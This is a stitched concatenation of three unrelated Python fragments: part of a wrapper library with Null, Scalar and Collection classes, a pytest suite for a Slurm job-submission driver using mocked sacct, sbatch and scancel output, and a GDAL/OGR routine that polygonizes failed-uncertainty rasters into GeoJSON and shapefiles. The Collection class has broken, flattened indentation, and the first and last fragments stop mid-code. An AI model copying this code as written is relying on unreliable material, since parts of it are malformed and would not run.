        raise NullValueError()

    def require(self, func, msg="Requirement is violated (wrapper is null)"):
        """Raise :class:`NullValueError`; a null satisfies no requirement."""
        raise NullValueError()

    def isnull(self):
        """Return ``Scalar(True)``."""
        return Scalar(True)

    def __setitem__(self, key, val):
        # Assignment on a null is silently ignored.
        pass

    def __bool__(self):
        return False

    __nonzero__ = __bool__  # Python 2 truthiness hook

    def __str__(self):
        return "%s()" % type(self).__name__

    __repr__ = __str__

    def __hash__(self):
        # All instances of a given null type hash alike.
        return hash(type(self))

    def __eq__(self, other):
        # Comparisons against nulls propagate nullness.
        return type(self)()

    def __ne__(self, other):
        return type(self)()
@six.python_2_unicode_compatible
class Some(Wrapper):
    """
    Base class for non-null wrappers: holds a concrete value and implements
    the query interface on top of it.
    """
    def __init__(self, value):
        # The wrapped (raw) value; exposed via val().
        self._value = value

    def map(self, func):
        """
        Call a function on a wrapper's value, and wrap the result if necessary.
        Parameters:
            func : function(val) -> val
        Examples:
            >>> s = Scalar(3)
            >>> s.map(Q * 2)
            Scalar(6)
        """
        return Wrapper.wrap(_make_callable(func)(self._value))

    def apply(self, func):
        """
        Call a function on a wrapper, and wrap the result if necessary.
        Parameters:
            func: function(wrapper) -> val
        Examples:
            >>> s = Scalar(5)
            >>> s.apply(lambda val: isinstance(val, Scalar))
            Scalar(True)
        """
        return Wrapper.wrap(_make_callable(func)(self))

    def orelse(self, value):
        """
        Provide a fallback value for failed matches.
        Examples:
            >>> Scalar(5).orelse(10).val()
            5
            >>> Null().orelse(10).val()
            10
        """
        # Non-null wrappers ignore the fallback.
        return self

    def val(self):
        """
        Return the value inside a wrapper.
        Raises :class:`NullValueError` if called on a Null object
        """
        return self._value

    def require(self, func, msg="Requirement violated"):
        """
        Assert that self.apply(func) is True.
        Parameters:
            func : func(wrapper)
            msg : str
                The error message to display on failure
        Returns:
            If self.apply(func) is True, returns self.
            Otherwise, raises NullValueError.
        """
        if self.apply(func):
            return self
        raise NullValueError(msg)

    def isnull(self):
        """
        Return Scalar(False): this wrapper holds a concrete value.
        """
        return Scalar(False)

    def __str__(self):
        # returns unicode
        # six builds appropriate py2/3 methods from this
        return "%s(%s)" % (type(self).__name__, _repr(self._value))

    def __repr__(self):
        return repr(self.__str__())[1:-1]  # trim off quotes

    def __setitem__(self, key, val):
        # Item assignment is forwarded to the wrapped value.
        return self.map(Q.__setitem__(key, val))

    def __hash__(self):
        return hash(self._value)

    def __eq__(self, other):
        # Comparisons map over the value, so the result is a Scalar(bool).
        return self.map(lambda x: x == other)

    def __ne__(self, other):
        return self.map(lambda x: x != other)
class Null(BaseNull):
    """
    The null wrapper for ill-defined scalar values.

    Attribute access, calls, comparisons and arithmetic all yield a fresh
    :class:`Null`, so failed lookups chain safely; only ``len()`` errors.
    """
    def _propagate(self, *args, **kwargs):
        # Shared implementation: any operation on a null is a new Null.
        return Null()

    # Attribute access and calling.
    __getattr__ = _propagate
    __call__ = _propagate

    # Ordering comparisons (equality comes from BaseNull).
    __gt__ = __ge__ = __lt__ = __le__ = _propagate

    # Arithmetic (``__div__`` covers legacy Python 2 division).
    __add__ = __sub__ = __mul__ = _propagate
    __div__ = __truediv__ = __floordiv__ = _propagate
    __pow__ = __mod__ = _propagate

    def __len__(self):
        raise TypeError("Null has no len()")

    def __hash__(self):
        return super(Null, self).__hash__()
class Scalar(Some):
    """
    Wrapper around a single well-defined value.

    Comparisons are forwarded to the wrapped value and the boolean
    outcome comes back wrapped, e.g. ``Scalar(3) > 2`` is
    ``Scalar(True)``.  Calling a Scalar calls the wrapped value and
    wraps whatever it returns.

    Examples:
        >>> s = Scalar(3)
        >>> s > 2
        Scalar(True)
        >>> s.val()
        3
        >>> s + 5
        Scalar(8)
        >>> s + s
        Scalar(6)
        >>> bool(Scalar(3))
        True
        >>> Scalar(lambda x: x+2)(5)
        Scalar(7)
    """
    def __getattr__(self, attr):
        # Attribute access is forwarded to the wrapped value.
        return self.map(operator.attrgetter(attr))

    def __call__(self, *args, **kwargs):
        # Calling the wrapper calls the wrapped value and wraps the result.
        return self.map(operator.methodcaller('__call__', *args, **kwargs))

    def _binary(self, other, build):
        # Shared arithmetic plumbing: Null operands propagate unchanged;
        # anything else is unwrapped and combined via a Q expression.
        if isinstance(other, BaseNull):
            return other
        return self.map(build(_unwrap(other)))

    def __gt__(self, other):
        return self.map(lambda wrapped: wrapped > other)

    def __ge__(self, other):
        return self.map(lambda wrapped: wrapped >= other)

    def __lt__(self, other):
        return self.map(lambda wrapped: wrapped < other)

    def __le__(self, other):
        return self.map(lambda wrapped: wrapped <= other)

    def __bool__(self):
        return bool(self._value)
    # Python 2 truthiness hook shares the py3 implementation.
    __nonzero__ = __bool__

    def __len__(self):
        return len(self._value)

    def __add__(self, other):
        return self._binary(other, lambda v: Q + v)

    def __sub__(self, other):
        return self._binary(other, lambda v: Q - v)

    def __mul__(self, other):
        return self._binary(other, lambda v: Q * v)

    def __div__(self, other):
        return self._binary(other, lambda v: Q / v)

    def __floordiv__(self, other):
        return self._binary(other, lambda v: Q // v)

    def __pow__(self, other):
        return self._binary(other, lambda v: Q ** v)

    def __mod__(self, other):
        return self._binary(other, lambda v: Q % v)

    def __truediv__(self, other):
        return self._binary(other, lambda v: Q / v)
class Collection(Some):
"""
Collection's store lists of other wrappers.
They support most of the list methods (len, iter, getitem, etc).
"""
    def __init__(self, items):
        # Materialise *items* into a list and store it via the base wrapper.
        super(Collection, self).__init__(list(items))
        # Alias for readability: _items and _value are the same list object.
        self._items = self._value
        self._assert_items_are_wrappers()
def _assert_items_are_wrappers(self):
for item in self:
if not isinstance(item, Wrapper):
raise TypeError("Collection can only hold other wrappers")
def val(self):
"""
Unwraps each item in the collection, and returns as a list
"""
return list(self.iter_val())
    def first(self):
        """
        Return the first element of the collection, or :class:`Null`
        """
        # Delegates to __getitem__; presumably that yields Null for an
        # empty collection rather than raising — confirm against __getitem__.
        return self[0]
def iter_val(self):
"""
An iterator version of :meth:`val`
"""
return (item.val() for item in self._items)
def each(self, *funcs):
"""
Call `func` on each element in the collection.
If multiple functions are provided, each item
in the output will be a tuple of each
func(item) in self.
Returns a new Collection.
Example:
>>> col = Collection([Scalar(1), Scalar(2)])
>>> col.each(Q * 10)
Collection([Scalar(10), Scalar(20)])
>>> col.each(Q * 10, Q - 1)
Collection([Scalar((10, | |
<filename>tests/driver/test_slurm_driver.py
import os
import shutil
from datetime import timedelta, datetime, date
from typing import Collection, Iterator
from unittest.mock import Mock, ANY, call
import pytest
from kong import util
from kong.config import Config, slurm_schema
from kong.drivers import InvalidJobStatus
from kong.drivers.slurm_driver import (
SlurmInterface,
SlurmDriver,
SlurmAccountingItem,
ShellSlurmInterface,
)
from kong.model.folder import Folder
from kong.model.job import Job
from kong.util import is_executable, exhaust
@pytest.fixture
def driver(monkeypatch, state):
    """Build a SlurmDriver wired to a stubbed ShellSlurmInterface."""
    # Extend the shared state config with the slurm-specific section.
    config_data = state.config.data.copy()
    config_data["slurm_driver"] = dict(
        account="pseudo_account", node_size=42, default_queue="somequeue"
    )
    state.config = Config(config_data)
    # Make the abstract interface instantiable and skip its real __init__.
    monkeypatch.setattr(SlurmInterface, "__abstractmethods__", set())
    monkeypatch.setattr(ShellSlurmInterface, "__init__", Mock(return_value=None))
    interface = ShellSlurmInterface()
    return SlurmDriver(state.config, interface)
def test_sacct_parse(driver, monkeypatch, state):
    """Parse canned ``sacct`` output into SlurmAccountingItems, then check
    sbatch/scancel passthrough on the mocked slurm interface."""
    # Pipe-separated sacct rows: JobID|State|ExitCode|Submit|Start|End|NodeList.
    # ``.batch``/``.extern``/``.0`` rows are sub-steps of their parent job id;
    # the PENDING row has empty Start/End/NodeList fields.
    sacct_output = """
5205197|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.batch|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.extern|COMPLETED|0:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205197.0|FAILED|2:0|2020-03-17T10:10:35|2020-03-17T10:16:23|2020-03-17T14:16:48|z0021
5205206|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.batch|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.extern|COMPLETED|0:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205206.0|FAILED|2:0|2020-03-18T10:10:35|2020-03-18T10:16:23|2020-03-18T14:16:48|z0022
5205209|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.batch|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.extern|COMPLETED|0:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205209.0|FAILED|2:0|2020-03-19T10:10:35|2020-03-19T10:16:23|2020-03-19T14:16:48|z0023
5205223|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.batch|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.extern|COMPLETED|0:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205223.0|FAILED|13:0|2020-03-20T10:10:35|2020-03-20T10:16:23|2020-03-20T14:16:48|z0024
5205350|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.batch|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.extern|COMPLETED|0:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205350.0|FAILED|13:0|2020-03-21T10:10:35|2020-03-21T10:16:23|2020-03-21T14:16:48|z0025
5205355|PENDING|0:0|2020-03-22T10:10:35|||
5205757|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.batch|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.extern|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
5205757.0|COMPLETED|0:0|2020-03-23T10:10:35|2020-03-23T10:16:23|2020-03-23T14:16:48|z0026
22822|NOCLUE|0:0||2020-03-17T10:10:35||
""".strip()
    with monkeypatch.context() as m:
        mock = Mock(return_value=sacct_output.split("\n"))
        m.setattr(driver.slurm, "_sacct", mock)
        td = timedelta(days=10)
        res = list(driver.slurm.sacct([], td))
        starttime = date.today() - td
        mock.assert_called_once_with(
            format="JobID,State,ExitCode,Submit,Start,End,NodeList",
            noheader=True,
            parsable2=True,
            starttime=starttime,
            _iter=True,
        )
        # base datetime shared by all rows above (first Submit value)
        db = datetime(2020, 3, 17, 10, 10, 35)
        def fmt(dt):
            # sacct timestamps use ISO format without a timezone suffix
            return dt.strftime("%Y-%m-%dT%H:%M:%S")
        def make_other(d, host):
            # build the expected "other" dict for a job submitted at *d*
            return dict(
                submit=fmt(d),
                start=fmt(d.replace(minute=16, second=23)),
                end=fmt(d.replace(hour=14, minute=16, second=48)),
                node=host,
            )
        # Expected parse: one item per parent job id. PENDING maps to
        # SUBMITTED; the unrecognised "NOCLUE" state maps to UNKNOWN.
        ref = [
            SlurmAccountingItem(
                5_205_197, Job.Status.FAILED, 2, other=make_other(db, "z0021")
            ),
            SlurmAccountingItem(
                5_205_206,
                Job.Status.FAILED,
                2,
                other=make_other(db.replace(day=18), "z0022"),
            ),
            SlurmAccountingItem(
                5_205_209,
                Job.Status.FAILED,
                2,
                other=make_other(db.replace(day=19), "z0023"),
            ),
            SlurmAccountingItem(
                5_205_223,
                Job.Status.FAILED,
                13,
                other=make_other(db.replace(day=20), "z0024"),
            ),
            SlurmAccountingItem(
                5_205_350,
                Job.Status.FAILED,
                13,
                other=make_other(db.replace(day=21), "z0025"),
            ),
            SlurmAccountingItem(
                5_205_355,
                Job.Status.SUBMITTED,
                0,
                other={
                    "submit": fmt(db.replace(day=22)),
                    "start": None,
                    "end": None,
                    "node": None,
                },
            ),
            SlurmAccountingItem(
                5_205_757,
                Job.Status.COMPLETED,
                0,
                other=make_other(db.replace(day=23), "z0026"),
            ),
            SlurmAccountingItem(
                22822,
                Job.Status.UNKNOWN,
                0,
                other={
                    "submit": None,
                    "start": fmt(db.replace(day=17)),
                    "end": None,
                    "node": None,
                },
            ),
        ]
        assert len(ref) == len(res)
        for a, b in zip(ref, res):
            assert a == b
            assert a.other == b.other
        # sbatch passthrough: the batch job id is parsed from stdout
        batch_job_id = 5_207_375
        sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}")
        m.setattr(driver.slurm, "_sbatch", sbatch)
        job = Job()
        job.data["batchfile"] = "somefile.sh"
        jid = driver.slurm.sbatch(job)
        sbatch.assert_called_once_with("somefile.sh")
        assert jid == batch_job_id
        job.batch_job_id = jid
        # scancel passthrough: called with the job's batch id
        scancel = Mock()
        m.setattr(driver.slurm, "_scancel", scancel)
        driver.slurm.scancel(job)
        scancel.assert_called_once_with(batch_job_id)
def test_repr():
    # repr must be implemented and produce something printable for debugging
    item = SlurmAccountingItem(1, Job.Status.UNKNOWN, 0, {})
    assert repr(item) != ""
def test_create_job(driver, state):
    """Creating a slurm job materialises its scripts/directories and
    validates the walltime argument."""
    root = Folder.get_root()
    j1 = driver.create_job(
        command="sleep 1",
        folder=root,
        cores=1,
        name="job1",
        queue="somequeue",
        walltime=timedelta(hours=5),
    )
    assert j1.status == Job.Status.CREATED
    assert len(root.jobs) == 1 and root.jobs[0] == j1
    # not submitted yet, so no batch system id assigned
    assert j1.batch_job_id is None
    # all supporting files/directories must exist on disk
    assert os.path.exists(j1.data["log_dir"])
    assert os.path.exists(j1.data["output_dir"])
    assert os.path.exists(j1.data["jobscript"])
    assert os.path.exists(j1.data["batchfile"])
    assert is_executable(j1.data["jobscript"])
    # walltime may also be given as a HH:MM:SS string
    j2 = driver.create_job(
        command="sleep 1", walltime="03:00:00", folder=root, licenses="bliblablubb"
    )
    assert j2.data["walltime"] == "03:00:00"
    with open(j2.data["jobscript"]) as f:
        jobscript = f.read()
    # the generated jobscript embeds the job parameters
    assert str(j2.job_id) in jobscript
    assert str(j2.cores) in jobscript
    assert j2.command in jobscript
    for v in ["output_dir", "log_dir", "stdout"]:
        assert j2.data[v] in jobscript
    with open(j2.data["batchfile"]) as f:
        batchfile = f.read()
    # the sbatch batchfile embeds resources and scheduler directives
    assert str(j2.cores) in batchfile
    assert str(j2.memory) in batchfile
    for v in [
        "name",
        "slurm_out",
        "queue",
        "ntasks",
        "nnodes",
        "walltime",
        "account",
        "jobscript",
        "licenses",
    ]:
        assert str(j2.data[v]) in batchfile
    # invalid walltime values are rejected
    with pytest.raises(ValueError):
        driver.create_job(command="sleep 1", walltime="100:00:00", folder=root)
    with pytest.raises(ValueError):
        driver.create_job(command="sleep 1", walltime=42, folder=root)
def test_submit_job(driver, state, monkeypatch):
    """Submitting is only legal from CREATED and records the batch job id."""
    root = Folder.get_root()
    job = driver.create_job(
        command="sleep 1",
        folder=root,
        cores=1,
        name="job1",
        queue="somequeue",
        walltime=timedelta(hours=5),
    )
    assert job.status == Job.Status.CREATED
    # A job that is already SUBMITTED must be rejected.
    job.status = Job.Status.SUBMITTED
    job.save()
    with pytest.raises(InvalidJobStatus):
        driver.submit(job)
    job.status = Job.Status.CREATED
    job.save()
    batch_job_id = 5_207_375
    with monkeypatch.context() as m:
        sbatch = Mock(return_value=f"Submitted batch job {batch_job_id}")
        m.setattr(driver.slurm, "_sbatch", sbatch)
        driver.submit(job)
        sbatch.assert_called_once_with(job.data["batchfile"])
        assert job.status == Job.Status.SUBMITTED
        assert job.batch_job_id == str(batch_job_id)
def test_resubmit_job(driver, state, monkeypatch):
    """Resubmission is refused for running/submitted jobs and assigns a
    fresh batch job id when it succeeds."""
    root = Folder.get_root()
    j1 = driver.create_job(command="sleep 1", folder=root)
    assert j1.status == Job.Status.CREATED
    batch_job_id = 5_207_375
    sbatch = Mock(return_value=batch_job_id)
    monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
    driver.submit(j1)
    sbatch.assert_called_once_with(j1)
    assert j1.status == Job.Status.SUBMITTED
    assert j1.batch_job_id == str(batch_job_id)
    # no accounting info yet -> job still counts as submitted, so
    # resubmit must be refused
    monkeypatch.setattr(driver.slurm, "sacct", Mock(return_value=[]))
    with pytest.raises(InvalidJobStatus):
        driver.resubmit(j1)
    SAI = SlurmAccountingItem
    # accounting now reports the job as FAILED -> resubmit becomes legal
    monkeypatch.setattr(
        driver.slurm,
        "sacct",
        Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]),
    )
    bjid2 = 42
    sbatch = Mock(return_value=bjid2)
    monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
    with monkeypatch.context() as m:
        # job errors on kill, resubmits anyway
        m.setattr(driver, "kill", Mock(side_effect=RuntimeError()))
        m.setattr("os.path.exists", Mock(side_effect=[True, False, False]))
        m.setattr("os.remove", Mock())
        j1 = driver.resubmit(j1)
        sbatch.assert_called_once()
        assert j1.status == Job.Status.SUBMITTED
        assert j1.batch_job_id == str(bjid2)  # gets new batch job id
    with monkeypatch.context() as m:
        m.setattr(driver, "sync_status", Mock())  # disable sync for a second
        with pytest.raises(InvalidJobStatus):
            driver.resubmit(j1)  # stays in SUBMITTED, not accepted
    monkeypatch.setattr(
        driver.slurm,
        "sacct",
        Mock(return_value=[SAI(j1.batch_job_id, Job.Status.FAILED, 0, {})]),
    )
    # will go to failed
    bjid3 = 99
    sbatch = Mock(return_value=bjid3)
    monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
    j1 = driver.resubmit(j1)
    sbatch.assert_called_once()
    assert j1.status == Job.Status.SUBMITTED
    assert j1.batch_job_id == str(bjid3)
def test_job_bulk_resubmit(driver, state, monkeypatch):
    """Bulk resubmit resets exactly the given jobs, recreates their output
    dirs/stdout, and leaves unrelated jobs untouched."""
    root = Folder.get_root()
    jobs = [
        driver.create_job(
            command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
        ),
        driver.create_job(
            command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
        ),
        driver.create_job(
            command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
        ),
    ]
    # a job outside the resubmitted set; must keep its status (regression)
    other_job = driver.create_job(
        command="echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1", folder=root
    )
    other_job.status = Job.Status.COMPLETED
    other_job.save()
    jobs[0].status = Job.Status.FAILED
    jobs[0].save()
    sbatch = Mock(side_effect=[1, 2, 3])
    monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
    driver.bulk_submit(jobs[1:])
    assert sbatch.call_count == 2
    for job in jobs[1:]:
        job.status = Job.Status.COMPLETED
        with open(job.data["stdout"], "w") as f:
            f.write("hurz")
        job.save()
    # remove one output dir so resubmit has to recreate it
    shutil.rmtree(jobs[0].data["output_dir"])
    # we need to prevent driver from actually calling submit
    submit = Mock()
    remove = Mock(wraps=os.remove)
    makedirs = Mock()
    with monkeypatch.context() as m:
        m.setattr(driver, "submit", submit)
        m.setattr(driver.slurm, "sacct", Mock(return_value=[]))
        m.setattr(driver, "bulk_kill", Mock(side_effect=RuntimeError))
        m.setattr("os.remove", remove)
        m.setattr("os.makedirs", makedirs)
        driver.bulk_resubmit(jobs)
        assert submit.call_count == len(jobs)
    # stale stdout files were removed and output dirs recreated
    remove.assert_has_calls([call(j.data["stdout"]) for j in jobs[1:]], any_order=True)
    makedirs.assert_has_calls(
        [call(j.data["output_dir"]) for j in jobs[1:]], any_order=True
    )
    for job in jobs:
        job.reload()
        assert job.status == Job.Status.CREATED
    # bug: all jobs were reset to created. Check this is not the case anymore
    other_job.reload()
    assert other_job.status != Job.Status.CREATED
def test_resubmit_bulk_invalid_status(driver, state, monkeypatch):
    """bulk_resubmit must refuse jobs in CREATED/SUBMITTED/RUNNING states."""
    monkeypatch.setattr(driver, "sync_status", Mock())
    job = driver.create_job(command="sleep 1", folder=state.cwd)
    invalid_states = (Job.Status.CREATED, Job.Status.SUBMITTED, Job.Status.RUNNING)
    for invalid in invalid_states:
        job.status = invalid
        job.save()
        with pytest.raises(InvalidJobStatus):
            driver.bulk_resubmit([job])
def test_job_bulk_resubmit_no_submit(driver, state, monkeypatch):
    """With do_submit=False, a bulk resubmit must never call bulk_submit."""
    root = Folder.get_root()
    failing_command = "echo 'begin'; sleep 0.2 ; echo 'end' ; exit 1"
    jobs = [
        driver.create_job(command=failing_command, folder=root) for _ in range(3)
    ]
    sbatch = Mock(side_effect=[1, 2, 3])
    monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
    driver.bulk_submit(jobs)
    assert sbatch.call_count == 3
    # mark everything finished so resubmission is allowed
    for job in jobs:
        job.status = Job.Status.COMPLETED
        job.save()
    bulk_submit = Mock()
    with monkeypatch.context() as m:
        m.setattr(driver.slurm, "sacct", Mock(return_value=[]))
        m.setattr(driver, "bulk_submit", bulk_submit)
        driver.bulk_resubmit(jobs, do_submit=False)
        assert bulk_submit.call_count == 0
def test_stdout_stderr(driver, state, monkeypatch):
    """stdout() exposes the job's captured output; stderr() is unsupported."""
    root = Folder.get_root()
    job = driver.create_job(
        command="sleep 1",
        folder=root,
        cores=1,
        name="job1",
        queue="somequeue",
        walltime=timedelta(hours=5),
    )
    assert job.status == Job.Status.CREATED
    batch_job_id = 5_207_375
    monkeypatch.setattr(driver.slurm, "sbatch", Mock(return_value=batch_job_id))
    driver.submit(job)
    assert job.status == Job.Status.SUBMITTED
    assert job.batch_job_id == str(batch_job_id)
    expected_stdout = "VALUE VALUE VALUE"
    with open(job.data["stdout"], "w") as fh:
        fh.write(expected_stdout)
    with driver.stdout(job) as fh:
        assert fh.read() == expected_stdout
    # the slurm driver does not capture stderr separately
    with pytest.raises(NotImplementedError):
        driver.stderr(job)
def test_sync_status(driver, monkeypatch):
    """sync_status pulls the job state from sacct accounting data."""
    root = Folder.get_root()
    j1 = driver.create_job(command="sleep 1", folder=root)
    with monkeypatch.context() as m:
        # NOTE(review): this sbatch mock is superseded a few lines below
        sbatch = Mock(return_value=1)
        m.setattr(driver.slurm, "sbatch", sbatch)
        assert j1.status == Job.Status.CREATED
        batch_job_id = 5_207_375
        monkeypatch.setattr(driver.slurm, "sbatch", Mock(return_value=batch_job_id))
        driver.submit(j1)
        assert j1.status == Job.Status.SUBMITTED
        assert j1.batch_job_id == str(batch_job_id)
        # successive sacct answers: first RUNNING, then FAILED
        sacct_return = [
            [SlurmAccountingItem(batch_job_id, Job.Status.RUNNING, 0, {})],
            [SlurmAccountingItem(batch_job_id, Job.Status.FAILED, 0, {})],
        ]
        sacct = Mock(side_effect=sacct_return)
        monkeypatch.setattr(driver.slurm, "sacct", sacct)
        j1 = driver.sync_status(j1)
        assert j1.status == Job.Status.RUNNING
        j1 = driver.sync_status(j1)
        assert j1.status == Job.Status.FAILED
def test_bulk_create(driver, state):
    """bulk_create_jobs creates the requested number of CREATED jobs."""
    root = Folder.get_root()
    specs = [{"folder": root, "command": "sleep 1"} for _ in range(10)]
    jobs = driver.bulk_create_jobs(specs)
    assert len(jobs) == 10
    assert all(job.status == Job.Status.CREATED for job in jobs)
def test_bulk_submit(driver, state, monkeypatch):
    """bulk_submit pushes every job through _sbatch and stores the ids."""
    root = Folder.get_root()
    jobs = [
        driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'")
        for i in range(15)
    ]
    assert len(jobs) == 15
    assert all(job.status == Job.Status.CREATED for job in jobs)
    # one canned sbatch stdout line per job, ids counting up from 1
    responses = [f"Submitted batch job {i + 1}" for i in range(len(jobs))]
    sbatch = Mock(side_effect=responses)
    monkeypatch.setattr(driver.slurm, "_sbatch", sbatch)
    driver.bulk_submit(jobs)
    assert sbatch.call_count == len(jobs)
    for job in jobs:
        assert job.status == Job.Status.SUBMITTED
        assert str(job.job_id) == job.batch_job_id
def test_bulk_sync_status(driver, state, monkeypatch):
root = Folder.get_root()
jobs = [
driver.create_job(folder=root, command=f"sleep 0.1; echo 'JOB{i}'")
for i in range(15)
]
assert len(jobs) == 15
for job in jobs:
assert job.status == Job.Status.CREATED
sbatch = Mock(side_effect=[i + 1 for i in range(len(jobs))])
monkeypatch.setattr(driver.slurm, "sbatch", sbatch)
driver.bulk_submit(jobs)
sacct_return = [
"|".join([str(i + 1), "RUNNING", "0:0", "", "", "", ""])
for i in range(len(jobs))
]
sacct = Mock(return_value=sacct_return)
# pretend they're all running now
monkeypatch.setattr(driver.slurm, "_sacct", sacct)
jobs = driver.bulk_sync_status(jobs)
sacct.assert_called_once_with(
jobs=",".join([j.batch_job_id for j in jobs]),
format="JobID,State,ExitCode,Submit,Start,End,NodeList",
noheader=True,
parsable2=True,
starttime=ANY,
_iter=True,
)
for job in jobs:
assert job.status == Job.Status.RUNNING
sacct_return = [
"|".join([str(i + 1), "COMPLETED" if i < 6 else "FAILED", "0:0"] + [""] * 4)
for i in range(len(jobs))
]
sacct = Mock(return_value=sacct_return)
monkeypatch.setattr(driver.slurm, "_sacct", sacct)
jobs = driver.bulk_sync_status(jobs)
sacct.assert_called_once_with(
jobs=",".join([j.batch_job_id for j in jobs]),
format="JobID,State,ExitCode,Submit,Start,End,NodeList",
| |
make them more obvious. We've already
# calculated the pass/fail stats so this won't impact results.
failed_uncertainty_int8_grow = self._grow_pixels(
failed_uncertainty_int8, self.pixel_growth)
# simplify distance is calculated as the distance pixels are grown out
# `ifd.geotransform[1]` is pixel size
simplify_distance = self.pixel_growth * ifd.geotransform[1]
tile_ds = gdal.GetDriverByName('MEM').Create(
'',
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Float32
)
tile_ds.SetGeoTransform(tile_affine.to_gdal())
tile_band = tile_ds.GetRasterBand(1)
tile_band.WriteArray(allowable_uncertainty, 0, 0)
tile_band.SetNoDataValue(0)
tile_band.FlushCache()
tile_ds.SetProjection(ifd.projection)
tile_failed_ds = gdal.GetDriverByName('MEM').Create(
'',
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_uncertainty_int8_grow, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
ogr_driver = ogr.GetDriverByName('Memory')
ogr_dataset = ogr_driver.CreateDataSource('shapemask')
ogr_layer = ogr_dataset.CreateLayer('shapemask', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
ogr_simple_driver = ogr.GetDriverByName('Memory')
ogr_simple_dataset = ogr_simple_driver.CreateDataSource(
'failed_poly')
ogr_simple_layer = ogr_simple_dataset.CreateLayer(
'failed_poly', srs=None)
self._simplify_layer(
ogr_layer,
ogr_simple_layer,
simplify_distance)
ogr_srs_out = osr.SpatialReference()
ogr_srs_out.ImportFromEPSG(4326)
transform = osr.CoordinateTransformation(ogr_srs, ogr_srs_out)
for feature in ogr_simple_layer:
# transform feature into epsg:4326 before export to geojson
transformed = feature.GetGeometryRef()
transformed.Transform(transform)
geojson_feature = geojson.loads(feature.ExportToJson())
self.tiles_geojson.coordinates.extend(
geojson_feature.geometry.coordinates
)
ogr_simple_dataset.Destroy()
ogr_dataset.Destroy()
if self.spatial_export:
au = self._get_tmp_file('allowable_uncertainty', 'tif', tile)
tile_ds = gdal.GetDriverByName('GTiff').Create(
au,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Float32,
options=['COMPRESS=DEFLATE']
)
tile_ds.SetGeoTransform(tile_affine.to_gdal())
tile_band = tile_ds.GetRasterBand(1)
tile_band.WriteArray(allowable_uncertainty, 0, 0)
tile_band.SetNoDataValue(0)
tile_band.FlushCache()
tile_ds.SetProjection(ifd.projection)
tf = self._get_tmp_file('failed_uncertainty', 'tif', tile)
tile_failed_ds = gdal.GetDriverByName('GTiff').Create(
tf,
tile.max_x - tile.min_x,
tile.max_y - tile.min_y,
1,
gdal.GDT_Byte,
options=['COMPRESS=DEFLATE']
)
tile_failed_ds.SetGeoTransform(tile_affine.to_gdal())
tile_failed_band = tile_failed_ds.GetRasterBand(1)
tile_failed_band.WriteArray(failed_uncertainty_int8, 0, 0)
tile_failed_band.SetNoDataValue(0)
tile_failed_band.FlushCache()
tile_failed_ds.SetProjection(ifd.projection)
sf = self._get_tmp_file('failed_uncertainty', 'shp', tile)
ogr_driver = ogr.GetDriverByName("ESRI Shapefile")
ogr_dataset = ogr_driver.CreateDataSource(sf)
ogr_layer = ogr_dataset.CreateLayer(
'failed_uncertainty', srs=ogr_srs)
# used the input raster data 'tile_band' as the input and mask, if not
# used as a mask then a feature that outlines the entire dataset is
# also produced
gdal.Polygonize(
tile_failed_band,
tile_failed_band,
ogr_layer,
-1,
[],
callback=None
)
tile_ds = None
tile_failed_ds = None
ogr_dataset.Destroy()
self._move_tmp_dir()
def get_outputs(self) -> QajsonOutputs:
execution = QajsonExecution(
start=self.start_time,
end=self.end_time,
status=self.execution_status,
error=self.error_message
)
data = {
